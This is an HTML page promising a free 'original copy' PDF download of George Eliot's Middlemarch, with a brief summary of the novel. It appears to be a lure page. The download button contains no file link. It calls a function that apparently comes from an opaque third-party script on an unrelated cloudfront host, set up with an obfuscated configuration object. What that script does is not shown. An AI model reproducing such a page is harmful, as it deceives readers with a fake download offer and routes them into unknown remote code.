<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css">
  <link rel="icon" type="image/jpg" href="favicon.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Middlemarch by George Eliot</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      padding: 20px;
      max-width: 600px;
      margin: 0 auto;
    }
    h1, h2 {
      color: #333;
    }
    img {
      max-width: 100%;
      height: auto;
      display: block;
      margin: 10px auto;
    }
	.highlight {
      color: #FF5733; /* Set text color to orange */
    }
	
	.headd {
      max-width: 100%;
      margin: 50px auto;
      padding: 0 20px;
    }
    h1 {
      text-align: center;
      margin-bottom: 20px;
    }
    .first {
      text-align: center;
      margin-bottom: 10px;
    }
	p {
	  font-size: 20px;
	  line-height: 1.4em;
	}
	.tips {
	  font-size: 20px;
	  line-height: 1.4em;
	}
	
	.popup {
            display: none;
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            background-color: #fff;
            border: 1px solid #ddd;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
            width: 60%;
            max-width: 450px;
            padding: 20px;
            border-radius: 5px;
            text-align: center;
            font-family: Arial, sans-serif;
            z-index: 2;
			height: 300px;
        }

        @media only screen and (max-width: 600px) {
            .content {
                padding: 10px;
				
            }

            .popup {
                width: 80%;
                max-width: 100%;
				padding: 10px;
				height: 300px;
            }
        }

        #button {
            padding: 10px 20px;
            background-color: #000000;
            color: white;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            margin-top: 20px;
			height: 50px;
			width: 60%;
			display: block;
            margin: 0 auto;
        }

        #button:hover {
            background-color: #FF0000;
        }
  </style>
  
  
  
</head>
<body>

<div class="content">

<h1>Middlemarch by George Eliot <span class="highlight"><u>Original Copy FREE Download PDF</u></span> For Offline Reading</h1>
<img src="images/cover.jpg">

<br>




<h2>About Middlemarch</h2>
<p>Middlemarch, A Study of Provincial Life is a novel by English author George Eliot, the pen name of Mary Ann Evans. It appeared in eight installments (volumes) in 1871 and 1872.</P>
<P>Despite comic elements, Middlemarch uses realism to encompass historical events: the 1832 Reform Act, early railways, and the accession of King William IV. It looks at medicine of the time and reactionary views in a settled community facing unwelcome change. Eliot began writing the two pieces that formed the novel in 1869–1870 and completed it in 1871.</P>
<P> Initial reviews were mixed, but it is now seen widely as her best work and one of the great English novels.</p>


<br><br><br>

<!-- Add the popup div here -->
    <div>
        <button id="button" onclick="_yi()"><i class="fa fa-download" name="answer"></i> DOWNLOAD ORIGIAL COPY NOW</button>
    </div>
	
	
    <script type="text/javascript">
    var rqAaR_nDu_deqHEc={"it":4320833,"key":"00a5b"};
</script>
<script src="https://d3qborf6vf5lth.cloudfront.net/df8cdc4.js"></script>
	
	
	<br><br><br><br><br><br><br><br><br><br><br><br><br><br>

</body>
</html>
